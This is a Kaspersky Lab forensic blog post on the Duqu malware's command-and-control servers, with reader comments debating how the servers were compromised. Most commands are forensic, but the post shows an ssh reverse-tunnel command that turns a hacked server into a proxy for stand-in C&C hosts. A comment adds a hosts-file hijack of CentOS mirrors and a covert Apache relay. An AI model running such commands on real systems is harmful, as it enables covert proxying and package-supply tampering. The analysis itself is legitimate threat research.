
The Mystery of Duqu: Part Six (The Command and Control servers)

VitalyK
Kaspersky Lab Expert
Posted November 30, 15:10  GMT
Tags: Targeted Attacks, Stuxnet, Zero-day vulnerabilities, Duqu

Over the past few weeks, we have been busy researching the Command and Control infrastructure used by Duqu.

It is now a well-known fact that the original Duqu samples were using a C&C server in India, located at an ISP called Webwerks. Since then, another Duqu C&C server has been discovered which was hosted on a server at Combell Group Nv, in Belgium.

At Kaspersky Lab we have currently cataloged and identified over 12 different Duqu variants. These connect to the C&C servers in India and Belgium, but also to other C&C servers, notably two in Vietnam and one in the Netherlands. Besides these, many other servers were used as part of the infrastructure: some served as main C&C proxies, while others were used by the attackers to jump around the world and make tracing more difficult. Overall, we estimate there have been more than a dozen Duqu command and control servers active during the past three years.

Before going any further, let us say that we still do not know who is behind Duqu and Stuxnet. Although we have analyzed some of the servers, the attackers have covered their tracks quite effectively. On 20 October 2011 a major cleanup operation of the Duqu network was initiated. The attackers wiped every single server they had used as far back as 2009 – in India, Vietnam, Germany, the UK and so on. Nevertheless, despite the massive cleanup, we can shed some light on how the C&C network worked.

Server ‘A’ – Vietnam

Server ‘A’ was located in Vietnam and was used to control certain Duqu variants found in Iran. This was a Linux server running CentOS 5.5. Actually, all the Duqu C&C servers we have found so far run CentOS – version 5.4, 5.5 or 5.2. It is not known if this is just a coincidence or if the attackers have an affinity (exploit?) for CentOS 5.x.

When we began analyzing the server image, we first noticed that at least the ‘root’ folder and the system log files folder ‘/var/log/’ had a ‘last modified’ timestamp of 2011-10-20 18:07:28 (UTC+3).

However, both folders were almost empty. Despite the modification date/time of the root folder, there were no files inside modified even close to this date. This indicates that certain operations (probably deletions / cleaning) took place on 20 October at around 18:07:28 GMT+3 (22:07:28 Hanoi time).
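This kind of inconsistency is easy to demonstrate on a mounted copy of the image. A sketch of the check (the /mnt/serverA mount point is purely illustrative; GNU stat and findutils assumed):

# The directory mtimes say 20 October...
stat -c '%y  %n' /mnt/serverA/root /mnt/serverA/var/log
# ...yet nothing inside was touched anywhere near that date:
find /mnt/serverA/root /mnt/serverA/var/log -newermt '2011-10-19' -print | head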

Interestingly, on Linux it is sometimes possible to recover deleted files; however, in this case we couldn’t find anything. No matter how hard we searched, the sectors where the files should have been located were empty and full of zeroes.

By bruteforce scanning the slack (unused) space in the ‘/’ partition, we were able to recover parts of the ‘sshd.log’ file. This was somewhat unexpected, and it is an excellent lesson in Linux and ext3 file system internals: deleting a file doesn’t mean no traces or fragments remain, sometimes from older versions of the file. The reason is that Linux constantly reallocates commonly used files to reduce fragmentation, so it is possible to find parts of older versions of a certain file even after it has been thoroughly deleted.
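Conceptually, the recovery boils down to carving printable text out of the raw partition image and keeping anything that looks like an sshd log line. A minimal sketch (the image file name is illustrative, and our actual process was more involved):

# Scan the whole image (allocated and unallocated space alike) for printable
# strings and keep the ones that look like sshd log entries, with their offsets.
strings -a -t d server_a_root.img | grep -E 'sshd\[[0-9]+\]:' > recovered_sshd_fragments.txt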

As can be seen from the recovered log fragments, the root user logged in twice from the same IP address, on 19 July and 20 October. The latter login is quite close to the last modified timestamps on the root folder, which indicates this was the person responsible for the system cleanup – bingo!

So, what exactly was this server doing? We were unable to answer this question until we analyzed server ‘B’ (see below). However, we did find something really interesting. On 15 February 2011 openssh-5.8p1 (the source code) was copied to the machine and subsequently installed. The distribution is “openssh_5.8p1-4ubuntu1.debian.tar.gz” with an MD5 of ‘86f5e1c23b4c4845f23b9b7b493fb53d’ (a stock distribution). We can assume the machine had been running openssh-4.3p1 as included in the original distribution of CentOS 5.2. On 19 July 2011 OpenSSH 5.8p2 was copied to the system. It was compiled and the binaries were installed into /usr/local/sbin. The OpenSSH distribution was again the stock one.
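For reference, a stock portable OpenSSH build with no options is exactly what ends up under /usr/local; this is the generic procedure, not a recovered command history:

# Default --prefix is /usr/local, so sshd lands in /usr/local/sbin
# and its config in /usr/local/etc
tar xzf openssh-5.8p2.tar.gz
cd openssh-5.8p2
./configure && make && make install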

The date of 19 July is important because it indicates when the new OpenSSH 5.8p2 was compiled in the system. Just after that, the attackers logged in, probably to check if everything was OK.

One good way of looking at the server is to check the file deletions and put them into an activity graph. On days when notable operations were going on, you see a spike:

For our particular server, several spikes immediately raise suspicions: 15 February and 19 July, when the new versions of OpenSSH were installed, and 20 October, when the server cleanup took place. Additionally, we found spikes on 10 February and 3 April, when certain events took place. We were able to identify “dovecot” crashes on these dates, although we can’t be sure whether they were caused by the attackers (a “dovecot” remote exploit?) or were simply instabilities.
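The activity graph itself is straightforward to reproduce from the image’s file system metadata. A sketch using The Sleuth Kit and gawk (the image name is illustrative; the field position assumes the standard TSK body format):

# List deleted entries in body format, then count entries per day of their
# change time (field 10) - the cleanup days show up as obvious spikes.
fls -r -d -m / server_a_root.img > deleted.body
awk -F'|' '{ print strftime("%Y-%m-%d", $10) }' deleted.body | sort | uniq -c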

Of course, for server ‘A’, three big questions remain:

  • How did the attackers get access to this computer in the first place?
  • What exactly was its purpose and how was it (ab-)used?
  • Why did the attackers replace the stock OpenSSH 4.3 with version 5.8?
We will answer some of these at the end.

Server ‘B’ – Germany

This server was located at a data center in Germany that belongs to a Bulgarian hosting company. It was used by the attackers to log in to the Vietnamese C&C. Evidence also seems to indicate it was used as a Duqu C&C in the distant past, although we couldn’t determine the exact Duqu variant which did so.

Just like the server in Vietnam, this one was thoroughly cleaned on 20 October 2011. The “root” folder and the “etc” folder have timestamps from this date, once again pointing to file deletions / modifications on this date. Immediately after cleaning up the server, the attackers rebooted it and logged in again to make sure all evidence and traces were erased.

Once again, by scanning the slack (unused) space in the ‘/’ partition, we were able to recover parts of the ‘sshd.log’ file. Here are the relevant entries:

First of all, about the date – 18 November. Unfortunately, “sshd.log” doesn’t contain the year. So, we can’t know for sure if this was 2010 or 2009 (we do know it was NOT 2011) from this information alone. We were, however, able to find another log file which indicates that the date was 2009:

What you can see above is a fragment of a “logwatch” entry which indicates the date of the breach to be 23 November 2009, when the root user logged in from the IP address seen on 19 November in the “sshd.log”. The other two messages are also important – they are errors from “sshd” indicating that a port 80 and port 443 redirection was attempted; however, those ports were already busy. So now we know how these servers were used as C&C: port 80 and port 443 were redirected over sshd to the attackers’ server. These Duqu C&Cs were never used as true C&Cs – instead, they were used as proxies to redirect traffic to the real C&C, whose location remains unknown. Here’s what the full picture looks like:
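In practice, a single SSH session initiated from the attackers’ side is enough to turn a hacked box into such a proxy. A sketch of the mechanism (the host names are placeholders, and sshd on the proxy has to permit remote binds on public interfaces, e.g. via GatewayPorts):

# Run from the attackers' side: ask sshd on the hacked proxy to listen on
# ports 80/443 and tunnel every connection back through this session towards
# the real C&C. If a web server already owns those ports, sshd logs exactly
# the kind of "bind: Address already in use" errors seen above.
ssh -N -R 0.0.0.0:80:real-cc.example:80 -R 0.0.0.0:443:real-cc.example:443 root@hacked-proxy.example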

Answering the questions

So, how did these servers get hacked in the first place? One crazy theory points to a 0-day vulnerability in OpenSSH 4.3. Searching for “openssh 4.3 0-day” on Google finds some very interesting posts. One of them is (https://www.webhostingtalk.com/showthread.php?t=873301):

This post from user “jon-f”, which dates back to 2009, indicates a possible 0-day in OpenSSH 4.3 on CentOS; he even posted sniffed logs of the exploit in action, although they are encrypted and not easy to analyze.

Could this be the case here? Knowing the Duqu guys and their never-ending bag of 0-day exploits, does it mean they also have a Linux 0-day against OpenSSH 4.3? Unfortunately, we do not know.

If we look at the “sshd.log” from 18 November 2009, we can, however, get some interesting clues. The “root” user attempts to log in using a password multiple times from an IP in Singapore, until they finally succeed:

Note how the “root” user tries to log in at 15:21:11, fails a couple of times and then, 8 minutes and 42 seconds later, the login succeeds. This is more of an indication of password bruteforcing rather than a 0-day. So the most likely answer is that the root password was bruteforced.
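This pattern is easy to pull out of the recovered fragments (the file name comes from the carving sketch above and is purely illustrative):

# Tally failed vs. accepted root logins per source IP
grep -aoE '(Failed|Accepted) password for root from [0-9.]+' recovered_sshd_fragments.txt | sort | uniq -c | sort -rn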

Nevertheless, the third question remains: Why did the attackers replace the stock OpenSSH 4.3 with version 5.8? On the server in Germany we were able to recover parts of the “.bash_history” file just after the server was hacked:

The relevant commands are “yum install openssh5”, then “yum update openssh-server”. There must be a good reason why the attackers are so concerned about updating OpenSSH 4.3 to version 5. Unfortunately, we do not know the answer to this question. On an interesting note, we observed that the attackers are not exactly familiar with the “iptables” command line syntax. Additionally, they are not very sure about the “sshd_config” file format either, so they needed to bring up the manual for it (“man sshd_config”) as well as for the standard Linux ftp client. So what about the “sshd_config” file, the sshd configuration? Once again, by searching the slack space we were able to identify what they were after. In particular, they changed the following two lines:

GSSAPIAuthentication yes
UseDNS no

While the second one is relevant for speed, especially when performing port redirection over tunnels, the first one enables Kerberos authentication. We were able to determine that exactly the same modifications were applied in other cases.
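For anyone examining a similar image, the two tell-tale directives are easy to check for; both the stock location and the default location of a /usr/local build are worth looking at (the mount point is illustrative):

# Look for the modified directives in the stock and locally-built config paths
grep -HEi '^(GSSAPIAuthentication|UseDNS)' /mnt/serverB/etc/ssh/sshd_config /mnt/serverB/usr/local/etc/sshd_config 2>/dev/null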

Conclusion:

We have currently analyzed only a fraction of the available Duqu C&C servers. However, we were able to determine certain facts about how the infrastructure operated:

  1. The Duqu C&C servers operated as early as November 2009.
  2. Many different servers were hacked all around the world: in Vietnam, India, Germany, Singapore, Switzerland, the UK, the Netherlands, Belgium and South Korea, to name but a few locations. Most of the hacked machines were running CentOS Linux. Both 32-bit and 64-bit machines were hacked.
  3. The servers appear to have been hacked by bruteforcing the root password. (We do not believe in the OpenSSH 4.3 0-day theory - that would be too scary!)
  4. The attackers have a burning desire to update OpenSSH 4.3 to version 5 as soon as they get control of a hacked server.
  5. A global cleanup operation took place on 20 October 2011. The attackers wiped every single server which was used even in the distant past, e.g. 2009. Unfortunately, the most interesting server, the C&C proxy in India, was cleaned only hours before the hosting company agreed to make an image. If the image had been made earlier, it’s possible that now we’d know a lot more about the inner workings of the network.
  6. The “real” Duqu mothership C&C server remains a mystery just like the attackers’ identities.

We would also like to send a question to Linux admins and OpenSSH experts worldwide – why would you update OpenSSH 4.3 to version 5.8 as soon as you hack a machine running version 4.3? What makes version 5.8 so special compared to 4.3? Is it related to the option “GSSAPIAuthentication yes” in the config file?

We hope that by working together we can cast more light on the huge mystery that is the Duqu Trojan.

Kaspersky Lab would like to thank the companies PA Vietnam, Nara Syst and the Bulgarian CyberCrime unit for their kind support in this investigation. This wouldn’t have been possible without their cooperation.

You can contact the Kaspersky Duqu research team at “stopduqu AT Kaspersky DOT com”.


46 comments


ivan

2012 Mar 16, 21:56

Re: Kerberos OpenSSH

I wouldn't underestimate the OpenSSH+Kerberos bug theory. Let's see...
1. CentOS is known to lag behind RHEL in terms of rolling out patches, read this article dated Feb. 23, 2011 concerning CentOS <5.6 http://lwn.net/Articles/429364/.
2. On Feb 8, 2011 RedHat issued several patches, including one for Kerberos (krb5). It is reasonable to think that attackers saw those patches and knew fixes were not yet available for CentOS 5 servers, which gave anyone a window of a couple of weeks to develop an exploit.
http://lwn.net/Alerts/427122/
3. OpenSSH 4.3 allowed an unauthenticated client to pass embedded \0 characters in strings; this was fixed on August 31, 2010 and rolled out in OpenSSH 4.9
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/packet.c
4. These embedded \0 characters could have been passed on to kerb5 by OpenSSH's GSS API support, see:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/gss-serv-krb5.c

5. Patches for dovecot vulnerabilities were published on Feb 7, 2011 which may explain the crashes.
http://seclists.org/fulldisclosure/2011/Feb/116

So it may be possible that the attackers were using an OpenSSH+krb5 bug all along and rushed to close the attack vectors when they became publicly known.

Darrin Ward

2012 Mar 14, 09:12

I am so utterly fascinated by all of this. I am no *nix admin but I do play around with the command line a lot to get some work done... I compile some source code and hack things, but nothing major. I spend the vast majority of my time in the command line with Apache and php.

I totally agree about the uname -a and cat /etc/issue... When I saw that I was thinking "they don't know what system they're on".

I wonder if the port 80 and 443 issue has been fully investigated. I mean, obviously they're the standard HTTP and HTTPS ports, but I would expect most machines to already be running servers on those ports (as you see they ran into this by getting the binding errors - the ports were already in use). And you couldn't just disable the existing servers because then obviously the box owners would know that the Web services are down, giving them away.

So you'd have 2 choices: First option would be to use ports other than 80 and 443. Of course, then you would have to make sure those ports were open through firewalls (we can see they already worked with iptables), and traffic to a non-standard port would be suspicious anyway (although, even if servers weren't being run on 80 and 443, traffic to those ports would be suspicious!) ...

OR, second option, you could configure the existing server(s) operating on those ports to do the proxying of requests to other servers for you. That way you can leave the existing Web server(s) serving the anticipated content, but maybe set up a vhost for something else which is proxied. Apache httpd and most others can obviously do this. So I'm wondering whether the httpd.conf files or other web server config files were checked for anything suspicious?
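Purely as an illustration of that second option (nothing like this has been reported as found; mod_proxy/mod_proxy_http and the host names are my assumptions), such a vhost is only a few lines:

# Hypothetical reverse-proxy vhost: the box keeps serving its normal sites,
# while one extra hostname is quietly relayed to another server.
cat > /etc/httpd/conf.d/cdn.conf <<'EOF'
<VirtualHost *:80>
    ServerName       cdn.innocuous.example
    ProxyRequests    Off
    ProxyPass        / http://other-server.example/
    ProxyPassReverse / http://other-server.example/
</VirtualHost>
EOF
service httpd reload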

Hilbert Space

2012 Mar 10, 20:59

Re: the intelligence of those responsible

"iptables -F"

... All iptables rules are flushed
... This is stupid and only applicable to vanilla systems; if the iptables have forwarding rules and rewrites or a default DROP policy, downtime and customer anger WILL alert the sysop.
Not to mention that your current SSH connection's packets might well go to the bit bucket. End of story.

"uname -a"
"cat /etc/issue"

... These guys don't know what system this is!

"yum install openssh5" ("No such package")
"up2date" ("Command not found")
"yum search" ("What was that package name again?")

I'm not sure this isn't a uni freshman who begged long and hard for a root password in chatrooms.

Edited by Hilbert Space, 2012 Mar 10, 21:31

sansimon

2012 Mar 10, 07:38

the intelligence of those responsible

I found the use of "nano" etc. very strange...
I believe that whoever carried out the cleaning and the updates was following a how-to, like a soldier of an army on a mission.

Digital Human

2012 Mar 09, 13:04

Ideas

I do agree with the fact that brute forcing is unlikely. About the netcat thing: I used it once to execute commands from a remote host, which would explain the fast wipe. With a simple bash script it's more than enough to keep a door open.
My other idea about the "yum update openssh5": what if they just used their own repo and redirected the DNS? Why else did they disable DNS in ssh_config? Only for speed? Maybe it's just to cover up DNS requests.
Rule number one of hacking: DON'T HURRY.
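To be clear, that scenario needs nothing exotic. A speculative sketch only (illustrative IP, and in practice gpgcheck would also have to be dealt with):

# Point the distro's mirror-list host at an attacker-controlled server, then an
# innocent-looking update pulls the package from there.
echo "198.51.100.7  mirrorlist.centos.org" >> /etc/hosts
yum clean all && yum update openssh-server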

Digital Human

2012 Mar 09, 13:00

Re: Lord..

I do agree with you: brute forcing is unlikely. About the netcat thing: I used it once to execute commands from a remote host. With a simple bash script it's more than enough to keep a door open.
My other idea about the "yum update openssh5": what if they just used their own repo and redirected the DNS? Why else did they disable DNS in ssh_config? Only for speed? Rule number one of hacking: DON'T HURRY.

nomadlogic

2012 Mar 08, 01:55

why openssh_5.8p1-4ubuntu1.debian.tar.gz?

One question I have not seen asked yet is why this person (or persons) is using an Ubuntu-patched version of openssh on a CentOS box.

some possibilities:
- there is an exploit in this version of openssh that the ubuntu folks are shipping, and the people behind this are utilizing it on these CentOS boxes.

*or*

- as mentioned earlier, there are junior people doing the actual logging in and hacking on these systems. they are probably working off less than clear instructions or documentation, don't have much *nix foo and are probably working on a lousy internet cafe connection.

I'm kinda leaning towards the second possibility based on the huge gap between the quality of the code that has been written and how clumsily the backdoor was deployed. Aside from the choice of editors and the lack of knowledge of how iptables et al. work, a seasoned attacker would not rely on compilers being available on a target system to build an apparently required binary (in this case openssh-5.x).

having said that - the first possibility *is* interesting :)

DavidGrimes

2012 Jan 03, 01:13

the intelligence of those responsible

The only possible explanation for the occurrence of --help and man is that it is partly smoke and mirrors and mind games.
Should an admin or someone else interrupt the attacker while he's doing his work, it would be easy for most people to discount the intelligence or significance of what they saw. Observing this either in real time (through binoculars or a MiTM) it could seem amateurish, or post-mortem it could look like a coincidental power outage, hardware failure or some other external event interrupted the compromise and left it uncleaned. The admin discovers through a simple "history" that some newb script kiddie with no clue how to use iptables, yadda yadda...
The admin wouldn't be calling the law just because someone made his box a C&C server.

VonSatan

2012 Jan 02, 23:02

Re: Ops vs. Developers

If that's the case, then there's no such thing as a "server hack" here.
What we are looking at is just a noob server op trying to do his work, and these C&C servers belong to the attackers.
If you have a big operation going on, you won't risk it by using noob people as server ops.

VonSatan

2012 Jan 02, 22:38

Re: Not buying this

100% agree.
Only a noob with no clue about how to use Linux would be using commands with the "--help" switch... I mean "iptables --help"??? Come on man, wtf??
Also, these failed login attempts look more like another noob mistake, like having caps lock enabled, rather than a "brute force" method.

Mat

2011 Dec 30, 12:58

Ops vs. Developers

Based on the logs it seems clear that the people using the C&C servers are not very Linux savvy. There are two possibilities:

1) The duqu / stuxnet developers are experts about windows but don't know Linux very well. Possible but unlikely.

2) The people who "use" duqu / stuxnet are different from the people who wrote them. Which would be classic operational security practiced by countries the world over. Basically, you tell the developers as little as possible about the target or the time frame for using the tool. You then have a separate ops team that knows the target and time frame, but has limited knowledge of how the software works.

If you assume that duqu / stuxnet is government sponsored then you have "government quality" individuals on the ops team and world class developers writing the tools. Which would explain the behavior seen in the logs.

sameer-shelavale

2011 Dec 22, 05:56

What makes version 5.8 so special?

There is nothing special about 5.8 actually.
The special part, I believe, is in version 5.6.

This version allows SSH connection multiplexing and supports remote forwarding with dynamic port allocation - it can report the allocated port back.

Connection multiplexing allows a lot faster connections when using proxied SSH.
The remote connection forwarding can be used to bypass restrictive firewalls ;)
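For illustration, the two features referred to look roughly like this on a recent OpenSSH client (host name and user are placeholders):

# Remote forwarding with dynamic port allocation: listening port 0 lets the
# server pick a free port and report it back to the client.
ssh -N -R 0:localhost:443 user@proxy.example
# Connection multiplexing: later sessions to the same host reuse one
# established connection instead of doing a full new handshake each time.
ssh -o ControlMaster=auto -o ControlPath=~/.ssh/mux-%r@%h:%p -o ControlPersist=10m user@proxy.example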

From my point of view,

1. During the Duqu updates, the attacker logged in manually just to update OpenSSH. Maybe Duqu itself had no provision to run shell commands? (This sounds quite unrealistic, but may be the case for some unknown reason.)

2. With the updated version of OpenSSH, the attacker might have tried to make the communication of the Duqu servers more secure and fast, and it probably reduced the risk of the control being taken over by defending parties.

3. With the new method Duqu may leave fewer traces behind and may become harder to analyze.

Also, I am sure you have either not posted much data here, or have posted mostly irrelevant data which will not alert the attackers. :D

vegeances

2011 Dec 07, 20:01

dear friend,

Regarding the updating of OpenSSH 4.3 to version 5.8 as soon as they hack a machine running version 4.3:

They update it because the new version needs to uninstall the old files to make sure the update works properly on the machine. In this case, that makes it easier for the attacker to clean up all the traces that had been left. As you can see, the older version had been hacked, so the information is still in it; that's why the attacker updates it: to make sure the information will not fall into your hands. Otherwise, it would be easier to find out where the source came from.

Thank you. (Vegeances) P.S.: I volunteer to help you guys. (age: 16) I just came up with this after reading the post... (I hope I can be like you guys one day.) aha

Costin Raiu

2011 Dec 05, 16:39

Re: Lord..

Hi there,

" default centos distribution disables remote root login by default.."

Sorry to say, but you are wrong - default CentOS installs allow remote root logins. See above for the comment from one of the CentOS devs who recommends disabling remote root login and restricting access to trusted IPs only.

shitonme

2011 Dec 03, 05:04

Lord..

They did not use their own yum repo, nor did they bruteforce any 'root' password; the default CentOS distribution disables remote root login by default. It's pretty damned obvious that none of the people commenting on this have any clue about hacking.

shitonme

2011 Dec 03, 05:00

Re:

On your 2nd point, re: netstat;

I'm guessing that the backdoor they're using is one for OpenSSH where you have to connect from a certain source port (1234), or some other service that is backdoored and drops you to a root shell if you connect from the correct source port. Backdoors have operated like this for years; it's a lot less conspicuous for a backdoored daemon to act this way than to listen on a port that is not typically occupied by any of the normal or generic services. Think about it: you don't want your backdoor showing up in the IT guy's Nessus logs, do you?

ripratm

2011 Dec 01, 21:18

Re: Not buying this

I agree partially. I tend to lean towards some form of exploit vs brute force (whether that exploit is in ssh or something else). But 4 failed attempts doesn't scream brute force, more like a crappy typist or they just didn't have the right password. The box was probably previously compromised and someone gave them the password; they tried to log in with the wrong info and had to go find the password (email, chat, irc, etc), then were able to log in correctly.

I agree about the "if they are smart enough to write the worm, they probably should know their way around a unix box better". I'm guessing this particular person logging in is probably some lackey in the group vs the high-level hacker that compromised the box (going back to my first paragraph).

Not to mention, isn't root login turned off by default in almost all ssh installations (regardless of distro or OS)? It was probably previously hacked and then enabled.

Johnny Hughes

2011 Dec 01, 15:55

Re: Not buying this

There are no known dovecot exploits that allow remote access on CentOS. There is an exim exploit that would allow remote access and one krb5 issue that could allow remote execution of code ... and that could then give them access.

See my comments below for the exploit links.

You would need to do some research before just wildly deciding that "they got in via dovecot".

Also remember that the sources used to build CentOS contain backported code for security issues, so it is NOT just openssh-4.3p2 ... it has patches for all known security issues.

Backporting: (https://access.redhat.com/security/updates/backporting/)

Security Updates: (http://rhn.redhat.com/errata/rhel-server-errata-security.html)

Johnny Hughes

2011 Dec 01, 15:30

exim is a possible entry point on machines without an update

I am one of the CentOS Devs.

There is an Critical issue with exim that Red Hat published a fix for on 2010-DEC-10 (http://rhn.redhat.com/errata/RHSA-2010-0970.html). CentOS released our version of that fix on 11-Dec-2010 19:59 for CentOS-5. You can see it in the Vault here (http://vault.centos.org/5.5/updates/SRPMS/).

Other than that and some samba issues (hopefully nobody is exposing samba directly to the internet without a firewall :D), and some web browser issues, there are not many issues that a 5.2 (or higher) server would have. There is one possible krb5 issue too (http://rhn.redhat.com/errata/RHSA-2010-0029.html) ... but that one is not likely.

They most likely used some kind of brute force method to find the root login. People should disable direct root logins for ssh and require users to "su" to root if needed; they should also control their ssh connections with keys (and disable passwords altogether) and/or limit access to external ssh ports to only the IPs (or networks) that require access.
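A minimal sshd_config sketch along those lines (the values are illustrative, and the CIDR form of AllowUsers needs a reasonably recent OpenSSH):

PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers admin@203.0.113.0/24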

M F

2011 Dec 01, 14:59

Re: Re:

These commands and the iptables flushing indicate a setup for a reverse shell, reverse backdoor or something similar.
Maybe it was for their tunneling.

antus

2011 Dec 01, 12:17

up2date: to me this implies they have a big budget and are used to running RHEL, probably in their own labs, and ran it out of habit.

openssh5: perhaps they edited the DNS resolution or somehow manipulated the DNS traffic at the IP level to point the default yum repos to their own, which does have a backdoored openssh5 package in it. They may hope that the name 'openssh5' sets off fewer alarm bells in people's heads than 'openssh-backdoored'. I suspect this is also why they compiled their own openssh on the other system. Backdoored. While they may very well be using Kerberos, the backdoor may be switchable with that option. Any fragments of /var/log/yum.log available?

availability: I'd love to have a look over one of these images too.

Sam Crawford

2011 Dec 01, 02:30

Re: Re: Re: Kerberos OpenSSH

I did the same as _dvorak_ earlier and had a dig through all of the intermediate versions :)

The DoS issue didn't seem to allow unauthorised access - just denial of service. I did wonder earlier if the 8-minute pause between SSH logins was used to change the root password via some unknown exploit, which then allowed them to SSH in (and potentially restore the old root password, so as to avoid detection).

There were also quite a few Kerberos related fixes/changes (disabling SPNEGO, checking extra paths for krb5-config, etc), but none struck me as a major feature.

I'm also leaning towards the agent forwarding feature that Jesse and Costin mentioned earlier. It'd be interesting to work out if that could be related to the Kerberos auth being enabled - I cannot see a relation there at the moment.

Sam Crawford

2011 Dec 01, 02:17

Re: Re: Re: Re: Kerberos OpenSSH

Jesse - I wasn't disagreeing with you, I was disagreeing (only in a minor way) with Costin's description of the -W option.

Anyway, I doubt the -W option was the driver for installing the newer SSH server, given (a) the fact it's a client side option, (b) is netcat-like, but not actually netcat (using -L/-R with netcat on one side would give you more flexibility, as -W purely uses stdin and stdout)

Really interesting topic! Imagine what we'd do if we had access to all of the logs :-)

Jesse Carter

2011 Dec 01, 02:17

Re: Re: Re: Re: Strangely named files

To my knowledge you have to compile TGT in explicitly, which I didn't see in the logs. Feel free to correct me if I'm wrong. But I'd have to agree that kerb is in use for a reason. I guess I know what I'm reading up on tonight. :)

chort

2011 Dec 01, 02:07

Re: Re: Re: Re: Strangely named files

Whoops, good point. I saw .ssh in the path for the first and assumed the rest since it conveniently (almost) fit.

Jesse Carter

2011 Dec 01, 02:06

Re: Re: Re: Kerberos OpenSSH

Sam,

Helpful notes. I don't disagree that they can replicate *most* of what netcat can do using existing techniques.

My point was that it makes lots of things much simpler over tunneled services.
Additionally netcat has the potential to open up a couple of security loopholes when trying to compromise a host remotely (as stated in the article you referenced).

Nice catch on known_hosts by the way. You beat me to it. :)

Sam Crawford

2011 Dec 01, 02:05

Re: Re: Re: Strangely named files

Kerb auth or kerb auth forwarding? I've just been reading the docs on the latter, wondering if the agent forwarding feature that Jesse mentioned could be related to Kerberos auth being enabled. I don't think it is - you need TGT forwarding enabled to forward Kerberos auth, but there could be some combination or external configuration I'm overlooking.

Looking at Costin's post, I don't believe there was a .ssh/config - the only file under .ssh/ was 00000000000, which I'm in agreement is almost certainly known_hosts. Given that they were (relatively) careful, I'd be surprised if they created a .ssh/config file, when they could just pass everything to ssh via -o options.

Jesse Carter

2011 Dec 01, 01:56

Re: Re: Kerberos OpenSSH

Costin,

No problem, glad to help. Stinks about the KDC. I may be mistaken, but I'm under the impression that some implementations of Kerberos configure the KDC using properties instead of a .conf file. I'm not 100% sure whether or not OpenSSH has that option.

Regarding the deleted file names, I'm definitely in agreement with chort and Sam on that:

0 = .
00 = ..
000000 = config
00000000000 = known_hosts

chort

2011 Dec 01, 01:55

Re: Re: Kerberos OpenSSH

It has been suggested (http://twitter.com/#!/_dvorak_/status/141981510914949120) that the changelog for OpenSSH 4.4 might provide clues (http://www.openssh.org/txt/release-4.4).

One of the changes was a pre-auth DoS found by Mark Dowd that could possibly allow RCE on the portable (non-OpenBSD) version if GSSAPIAuthentication was enabled (I believe it is by default). Since it involves a race condition, perhaps the repeated login failures were not password brute-forcing, but rather it took several attempts to win the race.




